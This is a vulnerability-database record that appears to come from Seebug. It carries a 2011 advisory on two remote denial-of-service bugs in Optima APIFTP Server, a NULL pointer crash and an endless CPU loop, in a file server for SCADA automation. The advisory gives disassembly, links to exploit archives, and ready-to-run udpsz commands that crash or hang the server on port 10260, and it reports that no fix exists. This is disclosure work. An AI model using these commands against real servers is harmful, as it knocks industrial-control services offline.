{"href": "https://www.seebug.org/vuldb/ssvid-72328", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "optima apiftp server <= 1.5.2.13 - Multiple Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72328", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n #######################################################################\r\n\r\n Luigi Auriemma\r\n\r\nApplication: Optima APIFTP Server\r\n http://www.optimalog.com/home.html\r\nVersions: &#60;= 1.5.2.13\r\nPlatforms: Windows\r\nBugs: A] NULL pointer\r\n B] endless loop\r\nExploitation: remote\r\nDate: 13 Nov 2011\r\nAuthor: Luigi Auriemma\r\n e-mail: aluigi@autistici.org\r\n web: aluigi.org\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n1) Introduction\r\n2) Bugs\r\n3) The Code\r\n4) Fix\r\n\r\n\r\n#######################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\n\r\nOptima is a suite of automation software for controlling PLC via\r\nSCADA/HMI interface.\r\nAPIFTP Server is a file server for working with remote files located on\r\nshared folders.\r\n\r\n\r\n#######################################################################\r\n\r\n=======\r\n2) Bugs\r\n=======\r\n\r\n---------------\r\nA] NULL pointer\r\n---------------\r\n\r\nNULL pointer exploitable through too long path names.\r\nThe effect is the displaying of a MessageBox with the error and the\r\ncontinuing of the execution that will lead to a stack exaustion after\r\nsome seconds and the termination of the server.\r\n\r\n\r\n---------------\r\nB] endless loop\r\n---------------\r\n\r\nEndless loop with CPU at 100% caused by incomplete packets:\r\n\r\n 004A9C93 8B03 /MOV EAX,DWORD PTR DS:[EBX]\r\n 004A9C95 8B80 78010000 |MOV EAX,DWORD PTR DS:[EAX+178]\r\n 004A9C9B 2D B80B0000 |SUB EAX,0BB8 ; Switch (cases BB8..BE0)\r\n 004A9CA0 74 19 |JE SHORT APIFTPSe.004A9CBB\r\n 004A9CA2 83E8 14 |SUB EAX,14\r\n 004A9CA5 74 47 |JE SHORT APIFTPSe.004A9CEE\r\n 004A9CA7 83E8 0A |SUB EAX,0A\r\n 004A9CAA 0F84 9D000000 |JE APIFTPSe.004A9D4D\r\n 004A9CB0 83E8 0A |SUB EAX,0A\r\n 004A9CB3 0F84 CA000000 |JE APIFTPSe.004A9D83\r\n 004A9CB9 ^EB D8 |JMP SHORT APIFTPSe.004A9C93\r\n\r\n\r\n#######################################################################\r\n\r\n===========\r\n3) The Code\r\n===========\r\n\r\n\r\nhttp://aluigi.org/testz/udpsz.zip\r\nhttp://www.exploit-db.com/sploits/18112.zip\r\n\r\nA]\r\n udpsz -C &#34;e803 0400 ff&#34; -T -D -3 -d SERVER 10260 0x107\r\n\r\n wait some seconds, the tool will quit automatically\r\n\r\nB]\r\n udpsz -C &#34;e803 0400 00&#34; -T -D SERVER 10260 -1\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n4) Fix\r\n======\r\n\r\n\r\nNo fix.\r\n\r\n\r\n#######################################################################\r\n\n ", "id": "SSV:72328", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:41:37", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645390891}}

{}